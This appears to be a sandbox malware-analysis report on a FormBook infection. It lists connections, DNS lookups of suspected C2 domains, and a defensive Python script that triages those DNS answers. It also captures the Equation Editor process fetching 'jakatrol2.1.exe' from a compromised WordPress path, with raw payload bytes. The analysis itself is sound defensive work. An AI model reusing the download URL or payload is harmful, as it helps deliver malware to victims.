Nov 14, 2023 13:28:02.320044994 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.320250988 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.320327997 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.667289019 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687213898 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687242031 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687256098 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687268972 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687280893 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687293053 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687308073 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687319994 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687330961 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.687541008 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.687644005 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.891297102 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.993742943 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993801117 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993813038 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993829966 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993837118 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993851900 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993865013 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993876934 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993880033 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.993880033 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.993889093 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:02.993923903 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.993978024 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:02.994016886 CET | 49166 | 80 | 192.168.2.22 | 91.195.240.19
Nov 14, 2023 13:28:03.300403118 CET | 80 | 49166 | 91.195.240.19 | 192.168.2.22
Nov 14, 2023 13:28:23.604310036 CET | 49167 | 80 | 192.168.2.22 | 38.11.36.68
Nov 14, 2023 13:28:23.777333021 CET | 80 | 49167 | 38.11.36.68 | 192.168.2.22
Nov 14, 2023 13:28:23.777555943 CET | 49167 | 80 | 192.168.2.22 | 38.11.36.68
Nov 14, 2023 13:28:23.777817965 CET | 49167 | 80 | 192.168.2.22 | 38.11.36.68
Nov 14, 2023 13:28:23.949883938 CET | 80 | 49167 | 38.11.36.68 | 192.168.2.22
Nov 14, 2023 13:28:23.950438976 CET | 80 | 49167 | 38.11.36.68 | 192.168.2.22
Nov 14, 2023 13:28:23.950762033 CET | 49167 | 80 | 192.168.2.22 | 38.11.36.68
Nov 14, 2023 13:28:23.950858116 CET | 49167 | 80 | 192.168.2.22 | 38.11.36.68
Nov 14, 2023 13:28:24.122905016 CET | 80 | 49167 | 38.11.36.68 | 192.168.2.22
Nov 14, 2023 13:28:45.013690948 CET | 49168 | 80 | 192.168.2.22 | 3.33.130.190
Nov 14, 2023 13:28:45.165218115 CET | 80 | 49168 | 3.33.130.190 | 192.168.2.22
Nov 14, 2023 13:28:45.165352106 CET | 49168 | 80 | 192.168.2.22 | 3.33.130.190
Nov 14, 2023 13:28:45.165462017 CET | 49168 | 80 | 192.168.2.22 | 3.33.130.190
Nov 14, 2023 13:28:45.316684008 CET | 80 | 49168 | 3.33.130.190 | 192.168.2.22
Nov 14, 2023 13:28:45.382431030 CET | 80 | 49168 | 3.33.130.190 | 192.168.2.22
Nov 14, 2023 13:28:45.382482052 CET | 80 | 49168 | 3.33.130.190 | 192.168.2.22
Nov 14, 2023 13:28:45.382580996 CET | 49168 | 80 | 192.168.2.22 | 3.33.130.190
Nov 14, 2023 13:28:45.382627964 CET | 49168 | 80 | 192.168.2.22 | 3.33.130.190
Nov 14, 2023 13:28:45.396579981 CET | 80 | 49168 | 3.33.130.190 | 192.168.2.22
Nov 14, 2023 13:28:45.396661997 CET | 49168 | 80 | 192.168.2.22 | 3.33.130.190
Nov 14, 2023 13:28:45.534183025 CET | 80 | 49168 | 3.33.130.190 | 192.168.2.22
Nov 14, 2023 13:29:05.731285095 CET | 49169 | 80 | 192.168.2.22 | 34.149.87.45
Nov 14, 2023 13:29:05.883409023 CET | 80 | 49169 | 34.149.87.45 | 192.168.2.22
Nov 14, 2023 13:29:05.883658886 CET | 49169 | 80 | 192.168.2.22 | 34.149.87.45
Nov 14, 2023 13:29:05.883658886 CET | 49169 | 80 | 192.168.2.22 | 34.149.87.45
Nov 14, 2023 13:29:06.035727978 CET | 80 | 49169 | 34.149.87.45 | 192.168.2.22
Nov 14, 2023 13:29:06.066524982 CET | 80 | 49169 | 34.149.87.45 | 192.168.2.22
Nov 14, 2023 13:29:06.066560030 CET | 80 | 49169 | 34.149.87.45 | 192.168.2.22
Nov 14, 2023 13:29:06.066716909 CET | 49169 | 80 | 192.168.2.22 | 34.149.87.45
Nov 14, 2023 13:29:06.066764116 CET | 49169 | 80 | 192.168.2.22 | 34.149.87.45
Nov 14, 2023 13:29:06.218295097 CET | 80 | 49169 | 34.149.87.45 | 192.168.2.22
Nov 14, 2023 13:29:44.455823898 CET | 49170 | 80 | 192.168.2.22 | 206.188.193.211
Nov 14, 2023 13:29:47.458198071 CET | 49170 | 80 | 192.168.2.22 | 206.188.193.211
Nov 14, 2023 13:29:47.675571918 CET | 80 | 49170 | 206.188.193.211 | 192.168.2.22
Nov 14, 2023 13:29:47.675832987 CET | 49170 | 80 | 192.168.2.22 | 206.188.193.211
Nov 14, 2023 13:29:47.675930977 CET | 49170 | 80 | 192.168.2.22 | 206.188.193.211
Nov 14, 2023 13:29:50.687489986 CET | 49170 | 80 | 192.168.2.22 | 206.188.193.211
Nov 14, 2023 13:29:53.008421898 CET | 49170 | 80 | 192.168.2.22 | 206.188.193.211
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 14, 2023 13:26:23.654068947 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:26:23.819900990 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:27:01.154933929 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:27:01.361637115 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:27:21.881318092 CET | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:27:22.065354109 CET | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:28:01.827485085 CET | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:28:02.012876034 CET | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:28:23.203567028 CET | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:28:23.603432894 CET | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:28:44.835366964 CET | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:28:45.006840944 CET | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:29:05.508264065 CET | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:29:05.729218960 CET | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:29:23.881514072 CET | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:29:24.058892965 CET | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Nov 14, 2023 13:29:44.198112011 CET | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Nov 14, 2023 13:29:44.450772047 CET | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 14, 2023 13:26:23.654068947 CET | 192.168.2.22 | 8.8.8.8 | 0xf2c1 | Standard query (0) | mail.treeoflifeadventures.com | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:27:01.154933929 CET | 192.168.2.22 | 8.8.8.8 | 0x622a | Standard query (0) | www.narrativepages.com | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:27:21.881318092 CET | 192.168.2.22 | 8.8.8.8 | 0xa59f | Standard query (0) | www.credit-cards-16215.bond | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:01.827485085 CET | 192.168.2.22 | 8.8.8.8 | 0xebec | Standard query (0) | www.luxpsy.com | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:23.203567028 CET | 192.168.2.22 | 8.8.8.8 | 0x15a2 | Standard query (0) | www.sxchenggu.com | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:44.835366964 CET | 192.168.2.22 | 8.8.8.8 | 0xc2c0 | Standard query (0) | www.centralngs.com | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:29:05.508264065 CET | 192.168.2.22 | 8.8.8.8 | 0xb8e | Standard query (0) | www.west-paws.com | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:29:23.881514072 CET | 192.168.2.22 | 8.8.8.8 | 0xe8fb | Standard query (0) | www.pj69vip12.cyou | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:29:44.198112011 CET | 192.168.2.22 | 8.8.8.8 | 0xbbcb | Standard query (0) | www.miamirealestatecommercial.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 14, 2023 13:26:00.929542065 CET | 8.8.8.8 | 192.168.2.22 | 0x9680 | No error (0) | windowsupdatebg.s.llnwi.net | | 69.164.40.8 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:26:23.819900990 CET | 8.8.8.8 | 192.168.2.22 | 0xf2c1 | No error (0) | mail.treeoflifeadventures.com | | 41.185.64.155 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:27:01.361637115 CET | 8.8.8.8 | 192.168.2.22 | 0x622a | No error (0) | www.narrativepages.com | | 103.224.212.212 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:27:22.065354109 CET | 8.8.8.8 | 192.168.2.22 | 0xa59f | Name error (3) | www.credit-cards-16215.bond | none | none | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:02.012876034 CET | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | www.luxpsy.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2023 13:28:02.012876034 CET | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:23.603432894 CET | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | www.sxchenggu.com | | 38.11.36.68 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:45.006840944 CET | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | No error (0) | www.centralngs.com | centralngs.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2023 13:28:45.006840944 CET | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | No error (0) | centralngs.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:28:45.006840944 CET | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | No error (0) | centralngs.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:29:05.729218960 CET | 8.8.8.8 | 192.168.2.22 | 0xb8e | No error (0) | www.west-paws.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2023 13:29:05.729218960 CET | 8.8.8.8 | 192.168.2.22 | 0xb8e | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2023 13:29:05.729218960 CET | 8.8.8.8 | 192.168.2.22 | 0xb8e | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:29:24.058892965 CET | 8.8.8.8 | 192.168.2.22 | 0xe8fb | Name error (3) | www.pj69vip12.cyou | none | none | A (IP address) | IN (0x0001) | false
Nov 14, 2023 13:29:44.450772047 CET | 8.8.8.8 | 192.168.2.22 | 0xbbcb | No error (0) | www.miamirealestatecommercial.com | | 206.188.193.211 | A (IP address) | IN (0x0001) | false
                                • mail.treeoflifeadventures.com
                                • www.narrativepages.com
                                • www.luxpsy.com
                                • www.sxchenggu.com
                                • www.centralngs.com
                                • www.west-paws.com
                                • www.miamirealestatecommercial.com
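The DNS answer table and the contacted-domain list above show the usual FormBook picture: the injected process walks a list of configured domains, and in this run two of them are NXDOMAIN, one is a registrar parking page, and the rest resolve (one of them, www.west-paws.com, through a two-hop CNAME chain). The script below is an added example and not part of the Joe Sandbox report. It re-types the answer records from the table as constructed input (the Windows Update lookup is left out as sandbox background noise), follows each transaction's CNAME chain, and separates NXDOMAIN names, parked names and names that actually resolve, so the analyst knows which hosts are worth pivoting on. The parking-host list is an assumption built from the two parking hosts visible in this report; a real deployment would use a fuller list.

```python
"""Triage of the DNS answers in the report: follow CNAME chains, separate
NXDOMAIN names from names that resolve, and flag those that land on a
domain-parking service (a parked decoy is not a live C2)."""
from collections import defaultdict

# Assumption: parking hosts worth flagging. The first is the CNAME target
# seen for www.luxpsy.com in this report; sedoparking.com is referenced by
# the parked page body the sample received from that host.
PARKING_HOSTS = ("parkingpage.namecheap.com", "sedoparking.com")

# Constructed from the report's DNS answer table:
# (transaction id, reply code, name, cname, address); "" = empty column.
ANSWERS = [
    ("0xf2c1", 0, "mail.treeoflifeadventures.com", "", "41.185.64.155"),
    ("0x622a", 0, "www.narrativepages.com", "", "103.224.212.212"),
    ("0xa59f", 3, "www.credit-cards-16215.bond", "", ""),
    ("0xebec", 0, "www.luxpsy.com", "parkingpage.namecheap.com", ""),
    ("0xebec", 0, "parkingpage.namecheap.com", "", "91.195.240.19"),
    ("0x15a2", 0, "www.sxchenggu.com", "", "38.11.36.68"),
    ("0xc2c0", 0, "www.centralngs.com", "centralngs.com", ""),
    ("0xc2c0", 0, "centralngs.com", "", "3.33.130.190"),
    ("0xc2c0", 0, "centralngs.com", "", "15.197.148.33"),
    ("0xb8e", 0, "www.west-paws.com", "cdn1.wixdns.net", ""),
    ("0xb8e", 0, "cdn1.wixdns.net", "td-ccm-neg-87-45.wixdns.net", ""),
    ("0xb8e", 0, "td-ccm-neg-87-45.wixdns.net", "", "34.149.87.45"),
    ("0xe8fb", 3, "www.pj69vip12.cyou", "", ""),
    ("0xbbcb", 0, "www.miamirealestatecommercial.com", "", "206.188.193.211"),
]


def triage(answers):
    """Return {queried name: {"status": ..., "chain": [...], "ips": [...]}}.

    Records are grouped by transaction id; the first record of a transaction
    names what was queried. CNAME records are followed, with a loop guard,
    until a name that carries A records is reached.
    """
    by_tid = defaultdict(list)
    for rec in answers:
        by_tid[rec[0]].append(rec)

    results = {}
    for recs in by_tid.values():
        qname = recs[0][2]
        if any(rcode == 3 for _, rcode, *_ in recs):
            results[qname] = {"status": "nxdomain", "chain": [], "ips": []}
            continue
        cnames = {name: target for _, _, name, target, _ in recs if target}
        addrs = defaultdict(list)
        for _, _, name, _, addr in recs:
            if addr:
                addrs[name].append(addr)
        chain, current = [], qname
        while current in cnames and len(chain) < 16:
            current = cnames[current]
            if current in chain or current == qname:
                break  # CNAME loop: stop rather than spin
            chain.append(current)
        parked = any(current == h or current.endswith("." + h) for h in PARKING_HOSTS)
        results[qname] = {
            "status": "parked" if parked else "resolved",
            "chain": chain,
            "ips": addrs.get(current, []),
        }
    return results


def live_candidates(results):
    """Names that resolved to something other than a parking service."""
    return sorted(n for n, r in results.items() if r["status"] == "resolved")


if __name__ == "__main__":
    verdicts = triage(ANSWERS)
    for name, r in verdicts.items():
        chain = " -> ".join(r["chain"]) or "-"
        print(f"{name:36} {r['status']:9} {chain:48} {', '.join(r['ips']) or '-'}")
    print("worth pivoting on:", live_candidates(verdicts))
```

DNS alone does not catch every dead end: www.narrativepages.com resolves directly, yet the HTTP session below answers the beacon with a 302 to a ww25 host rather than C2 content, so the HTTP response is the second signal to check before treating a resolved name as live infrastructure.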
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49162 | 41.185.64.155 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Nov 14, 2023 13:26:24.263209105 CET | 2 | OUT | GET /wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: mail.treeoflifeadventures.com
                                Connection: Keep-Alive
Nov 14, 2023 13:26:24.701302052 CET | 3 | IN | HTTP/1.1 200 OK
                                Date: Tue, 14 Nov 2023 12:26:24 GMT
                                Server: Apache
                                Last-Modified: Tue, 14 Nov 2023 03:41:46 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding,User-Agent
                                Content-Encoding: gzip
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Transfer-Encoding: chunked
                                Content-Type: application/x-msdownload
                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 79 3c 94 df fb 38 8e df b3 60 ac 33 8a 52 28 8a 52 22 85 22 a9 b1 8c b4 a8 11 86 4a a2 d0 98 64 9d 89 ca da 50 c6 a4 7d df 45 cb b3 7d 4f 1b 63 09 95 a2 5d a5 08 e5 d6 a8 88 6c c9 fc ae 73 cf a8 e7 eb fd f9 bc be df ef 1f bf ed 8f 8f 47 67 ee b3 9f eb 5c e7 5a cf 39 f7 9d c7 e2 6d 18 05 c3 30 2a 04 99 0c c3 f2 30 f9 1f 13 fb bf ff 2b 87 a0 35 f2 b6 16 76 4d f5 b1 71 1e 69 de 63 63 6f 6e 58 ac 51 54 4c e4 ca 98 a0 d5 46 2b 82 22 22 22 f9 46 cb 43 8c 62 04 11 46 61 11 46 ae 0b bc 8c 56 47 06 87 58 6a 6a aa 99 28 fa 38 6f 65 96 da ec e9 f6 6c 20 8c 0f 18 f6 4c 4a c4 67 3d 8b 26 d2 fa cf 3e c3 f3 5e cc 9a 67 0d f0 b4 f4 65 3e c3 e1 b9 30 6c 05 17 d5 1f 80 85 cd c2 b0 79 24 25 2c 64 9a 8c 33 90 57 87 d1 49 ea 24 65 0c f3 87 c4 2b 12 31 c9 5f 56 10 67 40 88 52 cc 12 c5 c9 f2 f9 2b 2b f0 40 fc 5d a2 fc 49 40 71 0a 51 11 d5 fd f3 fc f3 20 fe f4 f8 18 76 0c 45 aa c8 18 e3 e9 ff 03 e4 fd 3f fd 03 38 13 c8 ff bd d8 92 1f 12 0f 43 63 d2 c5 0a 80 d0 5c a9 ff 59 c7 08 c3 02 2d 63 82 83 f8 41 18 b6 47 5b de 27 36 08 42 e0 7f d6 63 c2 3f 4b 79 35 cc ee 12 e0 6b 1b 26 47 4a cc ff 52 4f 62 19 a1 a8 98 02 81 fd bf 07 30 05 d5 8b 89 8d 59 81 40 43 38 01 dc 60 68 c5 e2 ff d7 71 ff fb 0c ff cf df ff 27 ff 7c c4 2d c2 16 7f 61 a2 06 9d 6f 0e bf 6e 62 96 8e 40 53 e8 ae c7 10 6b ba cf 74 c6 44 ee 54 b6 4c c0 90 09 34 64 02 9a 4c b7 23 9a 89 35 3b 03 65 78 71 c4 b6 6c 28 cf 62 e5 fa b2 89 a2 6e 28 12 86 74 60 22 96 46 16 ab 51 9e d7 07 79 e2 c4 56 61 48 2b 26 36 64 47 41 db 14 18 92 7e c3 6d 21 fd 06 87 43 bf e8 83 8b 2b cd 3d 70 fa c5 42 4a 91 c8 83 b1 bf 4b 66 fd 2c b3 15 ca 3d 21 8b 7e 63 be 0f fd a2 07 4e 29 14 3f 84 12 68 e1 8d 5a 64 96 43 39 9b 7e 91 c5 a0 14 41 76 e1 47 1a fd 86 44 bd 3c 8b d5 c1 16 79 74 cb 74 fd 60 18 21 ab 95 2a 62 e9 b0 e5 80 68 c8 74 b1 18 26 26 13 e8 c8 9e 0b 59 38 d5 3e 11 a7 6f 8e 93 c9 64 c2 24 3f 19 3f 44 b6 c6 46 a6 eb 0e ad d2 25 d0 86 ef 23 4e d4 e0 91 7c cb 
58 8d 0c 80 b5 8c 85 d3 e0 21 d3 75 85 0a b2 35 7e be 32 dd 79 51 44 5f 62 5b 26 44 7c 65 af e4 13 e6 1a 41 3d 36 4f c6 65 4e 75 86 5c 5d 2a 31 a2 06 94 13 e3 02 9e e4 28 61 43 fe b2 00 6b c9 92 07 45 0c 4c 3c cf 84 9a cd 05 34 8a 9f 7a 85 3d d3 03 b6 e5 f8 8a bd c9 b4 ce 22 32 7f 41 56 34 c9 5a e6 60 1b 0e c5 b1 ce e2 27 61 0f 50 79 96 2b 89 26 a6 75 16 92 f9 94 59 d2 11 9d 85 54 be aa b8 72 41 fa 03 be 91 94 d1 59 c8 10 a8 8b df 58 bf 15 36 90 ac df 88 f4 dc 94 50 0b 79 0f 31 0f 97 05 2c 29 a2 a2 e5 f6 f4 14 fb d0 60 fd 7e 84 75 a2 72 b1 21 02 c0 fa 01 a5 dd 57 e4 d1 07 28 14 bb d1 4e 93 f9 ea f6 1e 1a 7c 65 93 7c 67 91 1b cd 41 97 00 c2 55 5c 14 26 21 80 48 d0 a3 65 39 93 c4 74 04 87 1a 8f b4 10 3f 01 d8 44 49 aa c0 ac b3 90 c9 a7 c8 58 7d 9d 85 24 be 12 3c a5 90 e8 76 50 42 3d 88 ab 62 ee 5a 4b 00 90 07 45 34 4c 98 d8 87 f1 db 85 89 dd 18 5f 59 38 9f c6 94 36 89 e7 d3 52 3e 26 0b 1f 90 44 f3 69 d2 37 7f 70 c3 b1 ee 14
                                Data Ascii: 1faay<8`3R(R""JdP}E}Oc]lsGg\Z9m0*0+5vMqicconXQTLF+"""FCbFaFVGXjj(8oel LJg=&>^ge>0ly$%,d3WI$e+1_Vg@R++@]I@qQ vE?8Cc\Y-cAG['6Bc?Ky5k&GJROb0Y@C8`hq'|-aonb@SktDTL4dL#5;exql(bn(t`"FQyVaH+&6dGA~m!C+=pBJKf,=!~cN)?hZdC9~AvGD<ytt`!*bht&&Y8>od$??DF%#N|X!u5~2yQD_b[&D|eA=6OeNu\]*1(aCkEL<4z="2AV4Z`'aPy+&uYTrAYX6Py1,)`~ur!W(N|e|gAU\&!He9t?DIX}$<vPB=bZKE4L_Y86R>&Di7p
Nov 14, 2023 13:26:24.701364994 CET | 5 | IN | Data Raw: f6 18 c5 da d8 13 13 59 33 21 8b 4d f3 15 93 4f 2b 0b 06 59 cb 66 3d 6f 4a 5f d7 c7 a7 6a 90 a4 64 93 7e 11 d9 2d b5 e8 5f 73 7e b3 2c 40 3e 65 61 8b 46 36 a2 56 61 48 1f 50 ae d2 2e 58 51 5f b1 23 aa 23 62 75 8b 59 dd d6 ef ec f5 f8 73 1d 6a 63
                                Data Ascii: Y3!MO+Yf=oJ_jd~-_s~,@>eaF6VaHP.XQ_##buYsjcYb[4&Y,0hp>/0u}HZJ\SPyYTQQ13P%[+S3/E08bM5UJg^Gp2A$]"2*'VBa
Nov 14, 2023 13:26:24.701405048 CET | 6 | IN | Data Raw: 34 1f 00 12 e6 91 f1 6b 88 49 29 68 d5 cf a0 18 09 e8 3d 9f 41 10 b7 88 55 95 31 82 af 0a 48 a7 a7 31 e9 a8 dd 78 68 e7 f0 0b 16 b9 9b 9e 61 09 39 0e dd 49 64 31 e8 a4 2a 4a 19 50 55 27 e2 ef 44 1a 4c 31 4d 1b 0a 13 e9 1c bc 07 b2 28 dd 6b 95 44
                                Data Ascii: 4kI)h=AU1H1xha9Id1*JPU'DL1M(kDKi_2D0-g-l4$Y8#$=MP $W-dtC/nP&H-<y{%Qb_#2pk!~,&0Z4ZCk,Mjlzk6YxmPD([-3I(=
Nov 14, 2023 13:26:24.701446056 CET | 7 | IN | Data Raw: 15 9e 31 be 0b f2 90 65 c7 c5 63 99 80 00 2f 6e 77 2c 22 7f 7e 0c c1 87 9b df 62 08 8f b4 2c 9f ee 85 5c 1a 1f a6 4a 63 cb b4 d1 fc e9 9b af c8 8b 38 6c 31 4d e6 c9 46 4a 94 46 90 33 91 36 11 7b e0 f9 32 54 a3 b0 b0 9b 36 ba 94 af 29 f6 a0 b1 3d
                                Data Ascii: 1ec/nw,"~b,\Jc8l1MFJF36{2T6)=00Y`?4#@*x97p01<~X5M#CuQ4ynn!"/<aY(@4w4tw^`<*AjP[:p
Nov 14, 2023 13:26:24.701483011 CET | 9 | IN | Data Raw: 6b 6c 14 d0 85 a5 7a 1c 5f fc 22 b0 41 73 15 f4 e1 29 e5 0b 1f c8 cc cb 45 1e 75 7c 0d 60 02 35 32 1a be 46 ca 90 09 f0 2c 37 3d 36 7e 0a 6a a6 cc 57 25 21 9f c7 a3 46 a4 b1 11 69 ff b4 dd 72 23 0c 9f d7 0c 4a 29 03 43 d6 5f 15 09 61 d5 88 2e 9c
                                Data Ascii: klz_"As)Eu|`52F,7=6~jW%!Fir#J)C_a.x?1~ PUAbROTeXm17o@;iMGTbc0HMvrO'|0Hb[=0cbt!7!<B+Ll7<0~b!}LlO?X7L
Nov 14, 2023 13:26:24.701525927 CET | 10 | IN | Data Raw: a8 95 8f 31 c1 54 13 e8 24 82 a9 a4 53 50 87 76 ee 7c 71 8e a2 c3 1e 40 c5 38 81 8e c8 91 8b 3a b1 0d bf 84 e0 e8 96 77 69 18 05 bf 39 7c 84 ef 47 84 45 22 62 b5 d0 37 9f 46 3e a7 2d 2a 32 6f 97 03 d0 49 6c 79 93 c4 dd 7c 17 73 56 87 23 ba 45 13
                                Data Ascii: 1T$SPv|q@8:wi9|GE"b7F>-*2oIly|sV#E&&J9L"q'BH8Y5o/hL 3N-&&0uC<^/.Q`&#+wo?l"(e<}%Cp[1@JDh
Nov 14, 2023 13:26:24.701565027 CET | 11 | IN | Data Raw: 18 f5 e5 05 82 17 9f 0f eb 93 8d 6c 83 7b 88 5e 85 75 46 3e 39 e8 5e 44 99 52 0d 32 b3 30 12 86 37 1a 11 ca 35 1d b1 b7 78 be bb c3 23 fe 3a 31 67 5e 76 3c 94 17 d4 59 02 1c 94 2a 5f 4a f9 42 4f d9 1a 57 fc 11 f0 f5 31 94 39 ad 98 ef 3d 7d 94 80
                                Data Ascii: l{^uF>9^DR2075x#:1g^v<Y*_JBOW19=}^Q8kWkRv}ekpKSq9DqXx(OF"3~An>z$iX>/:'1,Lb zhe"lrp#da`VP9y~H @ '/
Nov 14, 2023 13:26:24.701605082 CET | 13 | IN | Data Raw: 82 cf 00 20 88 e1 61 42 1a 78 c5 cb 01 3a 10 f8 f3 68 03 c5 84 18 57 42 b4 54 8c d8 66 e4 bf e1 97 d9 22 76 12 59 20 16 80 21 36 23 0b d0 02 6d b2 0a f4 ed 2d 50 35 fe 60 9e 9a af bc 8f 32 25 54 80 58 6f 40 ec 32 c0 57 13 26 98 50 e3 05 ca f2 7b
                                Data Ascii: aBx:hWBTf"vY !6#m-P5`2%TXo@2W&P{F'p0WsCEb^aEUrF<+D{cJM'E7u;;tbe_cd)lk!H&U>;qi"V7_[3n:eR
Nov 14, 2023 13:26:24.701642990 CET | 14 | IN | Data Raw: 1e 2f 1c ca 63 d1 64 c9 84 e7 87 e4 b1 fd 5a 06 df 8a cd fb 45 dc 4e c1 cf 28 5a 01 8d 57 cb 04 2f 78 7d 1c 1c bd 01 27 d5 22 76 fa d0 7e 27 7e 49 0b 9d 2f 80 bf 9a d3 88 8c 3c 35 9e 0a 1e fd 04 ec 62 74 cd a2 31 3d 4a 87 4f 11 25 f6 81 10 4b ec
                                Data Ascii: /cdZEN(ZW/x}'"v~'~I/<5bt1=JO%K%hJ>dEzHNx1TH+.tCT$,zK }<I&m/hI,:2|Nj?zEq4V~d@/J amjHs]2
